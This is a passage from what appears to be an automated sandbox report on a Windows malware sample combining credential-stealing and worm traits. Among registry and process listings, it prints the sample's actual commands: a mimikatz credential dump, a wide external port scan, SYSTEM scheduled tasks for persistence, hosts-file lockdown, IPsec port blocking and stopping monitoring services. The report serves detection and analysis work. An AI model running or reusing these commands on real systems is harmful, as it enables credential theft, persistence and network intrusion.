\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aginbln.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hmhriy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 448 cmd.exe 1424 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x00070000000233ee-5.dat nsis_installer_2 behavioral2/files/0x000c000000023371-15.dat nsis_installer_1 behavioral2/files/0x000c000000023371-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 47 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ aginbln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" aginbln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing aginbln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" aginbln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" aginbln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" aginbln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" aginbln.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1424 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2352 schtasks.exe 3176 schtasks.exe 4108 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4816 2024-08-31_b81556a816679c536595700714256658_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 4816 2024-08-31_b81556a816679c536595700714256658_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 524 aginbln.exe Token: SeDebugPrivilege 4720 aginbln.exe Token: SeDebugPrivilege 2972 vfshost.exe Token: SeDebugPrivilege 4936 fmiclltfn.exe Token: SeLockMemoryPrivilege 4076 unzsbd.exe Token: SeLockMemoryPrivilege 4076 unzsbd.exe Token: SeDebugPrivilege 3960 fmiclltfn.exe Token: SeDebugPrivilege 3472 fmiclltfn.exe Token: SeDebugPrivilege 2780 fmiclltfn.exe Token: SeDebugPrivilege 3988 fmiclltfn.exe Token: SeDebugPrivilege 4996 fmiclltfn.exe Token: SeDebugPrivilege 4672 fmiclltfn.exe Token: SeDebugPrivilege 4112 fmiclltfn.exe Token: SeDebugPrivilege 4596 fmiclltfn.exe Token: SeDebugPrivilege 1828 fmiclltfn.exe Token: SeDebugPrivilege 5056 fmiclltfn.exe Token: SeDebugPrivilege 4484 fmiclltfn.exe Token: SeDebugPrivilege 4036 fmiclltfn.exe Token: SeDebugPrivilege 4504 fmiclltfn.exe Token: SeDebugPrivilege 1864 fmiclltfn.exe Token: SeDebugPrivilege 2276 fmiclltfn.exe Token: SeDebugPrivilege 3240 fmiclltfn.exe Token: SeDebugPrivilege 1436 fmiclltfn.exe Token: SeDebugPrivilege 4980 fmiclltfn.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4816 2024-08-31_b81556a816679c536595700714256658_hacktools_icedid_mimikatz.exe 4816 2024-08-31_b81556a816679c536595700714256658_hacktools_icedid_mimikatz.exe 524 aginbln.exe 524 aginbln.exe 4720 aginbln.exe 4720 aginbln.exe 1036 xohudmc.exe 1780 hmhriy.exe 4764 aginbln.exe 4764 aginbln.exe 5964 aginbln.exe 5964 aginbln.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4816 wrote to memory of 448 4816 2024-08-31_b81556a816679c536595700714256658_hacktools_icedid_mimikatz.exe 84 PID 4816 wrote to memory of 448 4816 2024-08-31_b81556a816679c536595700714256658_hacktools_icedid_mimikatz.exe 84 PID 4816 wrote to memory of 448 4816 2024-08-31_b81556a816679c536595700714256658_hacktools_icedid_mimikatz.exe 84 PID 448 wrote to memory of 1424 448 cmd.exe 86 PID 448 wrote to memory of 1424 448 cmd.exe 86 PID 448 wrote to memory of 1424 448 cmd.exe 86 PID 448 wrote to memory of 524 448 cmd.exe 94 PID 448 wrote to memory of 524 448 cmd.exe 94 PID 448 wrote to memory of 524 448 cmd.exe 94 PID 4720 wrote to memory of 2936 4720 aginbln.exe 96 PID 4720 wrote to memory of 2936 4720 aginbln.exe 96 PID 4720 wrote to memory of 2936 4720 aginbln.exe 96 PID 2936 wrote to memory of 1476 2936 cmd.exe 98 PID 2936 wrote to memory of 1476 2936 cmd.exe 98 PID 2936 wrote to memory of 1476 2936 cmd.exe 98 PID 2936 wrote to memory of 2220 2936 cmd.exe 99 PID 2936 wrote to memory of 2220 2936 cmd.exe 99 PID 2936 wrote to memory of 2220 2936 cmd.exe 99 PID 2936 wrote to memory of 3044 2936 cmd.exe 100 PID 2936 wrote to memory of 3044 2936 cmd.exe 100 PID 2936 wrote to memory of 3044 2936 cmd.exe 100 PID 2936 wrote to memory of 676 2936 cmd.exe 101 PID 2936 wrote to memory of 676 2936 cmd.exe 101 PID 2936 wrote to memory of 676 2936 cmd.exe 101 PID 2936 wrote to memory of 2240 2936 cmd.exe 102 PID 2936 wrote to memory of 2240 2936 cmd.exe 102 PID 2936 wrote to memory of 2240 2936 cmd.exe 102 PID 2936 wrote to memory of 692 2936 cmd.exe 103 PID 2936 wrote to memory of 692 2936 cmd.exe 103 PID 2936 wrote to memory of 692 2936 cmd.exe 103 PID 4720 wrote to memory of 512 4720 aginbln.exe 107 PID 4720 wrote to memory of 512 4720 aginbln.exe 107 PID 4720 wrote to memory of 512 4720 aginbln.exe 107 PID 4720 wrote to memory of 4936 4720 aginbln.exe 109 PID 4720 wrote to memory of 4936 4720 aginbln.exe 109 PID 4720 wrote to memory of 4936 4720 aginbln.exe 109 PID 4720 wrote to memory of 3040 4720 aginbln.exe 111 PID 4720 wrote to memory of 3040 4720 aginbln.exe 111 PID 4720 wrote to memory of 3040 4720 aginbln.exe 111 PID 4720 wrote to memory of 3836 4720 aginbln.exe 116 PID 4720 wrote to memory of 3836 4720 aginbln.exe 116 PID 4720 wrote to memory of 3836 4720 aginbln.exe 116 PID 3836 wrote to memory of 2912 3836 cmd.exe 118 PID 3836 wrote to memory of 2912 3836 cmd.exe 118 PID 3836 wrote to memory of 2912 3836 cmd.exe 118 PID 2912 wrote to memory of 1936 2912 wpcap.exe 119 PID 2912 wrote to memory of 1936 2912 wpcap.exe 119 PID 2912 wrote to memory of 1936 2912 wpcap.exe 119 PID 1936 wrote to memory of 2664 1936 net.exe 121 PID 1936 wrote to memory of 2664 1936 net.exe 121 PID 1936 wrote to memory of 2664 1936 net.exe 121 PID 2912 wrote to memory of 4768 2912 wpcap.exe 122 PID 2912 wrote to memory of 4768 2912 wpcap.exe 122 PID 2912 wrote to memory of 4768 2912 wpcap.exe 122 PID 4768 wrote to memory of 776 4768 net.exe 124 PID 4768 wrote to memory of 776 4768 net.exe 124 PID 4768 wrote to memory of 776 4768 net.exe 124 PID 2912 wrote to memory of 1036 2912 wpcap.exe 125 PID 2912 wrote to memory of 1036 2912 wpcap.exe 125 PID 2912 wrote to memory of 1036 2912 wpcap.exe 125 PID 1036 wrote to memory of 4040 1036 net.exe 127 PID 1036 wrote to memory of 4040 1036 net.exe 127 PID 1036 wrote to memory of 4040 1036 net.exe 127 PID 2912 wrote to memory of 4804 2912 wpcap.exe 128
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1712
-
C:\Windows\TEMP\zfdehzegb\unzsbd.exe"C:\Windows\TEMP\zfdehzegb\unzsbd.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
C:\Users\Admin\AppData\Local\Temp\2024-08-31_b81556a816679c536595700714256658_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-31_b81556a816679c536595700714256658_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ihguignb\aginbln.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1424
-
-
C:\Windows\ihguignb\aginbln.exeC:\Windows\ihguignb\aginbln.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:524
-
-
-
C:\Windows\ihguignb\aginbln.exeC:\Windows\ihguignb\aginbln.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1476
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:2220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3044
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2240
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:692
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:512
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4936
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3040
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\wcbiqigng\imbbbzfne\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Windows\wcbiqigng\imbbbzfne\wpcap.exeC:\Windows\wcbiqigng\imbbbzfne\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:2664
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4768 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:776
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:4040
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:4804 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:4328
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2240 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4748
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4136
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4348
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4488 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4032
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\wcbiqigng\imbbbzfne\nhkqndyng.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\wcbiqigng\imbbbzfne\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:4316 -
C:\Windows\wcbiqigng\imbbbzfne\nhkqndyng.exeC:\Windows\wcbiqigng\imbbbzfne\nhkqndyng.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\wcbiqigng\imbbbzfne\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3704
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\wcbiqigng\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\wcbiqigng\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2208 -
C:\Windows\wcbiqigng\Corporate\vfshost.exeC:\Windows\wcbiqigng\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gfbbgwyue" /ru system /tr "cmd /c C:\Windows\ime\aginbln.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4672 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4416
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "gfbbgwyue" /ru system /tr "cmd /c C:\Windows\ime\aginbln.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "whinbeufb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ihguignb\aginbln.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2264 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4784
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "whinbeufb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ihguignb\aginbln.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bltebicig" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\zfdehzegb\unzsbd.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2504 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4308
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bltebicig" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\zfdehzegb\unzsbd.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2352
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3092
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4188
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2932
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5056
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:448
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:8
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4484
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:692
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
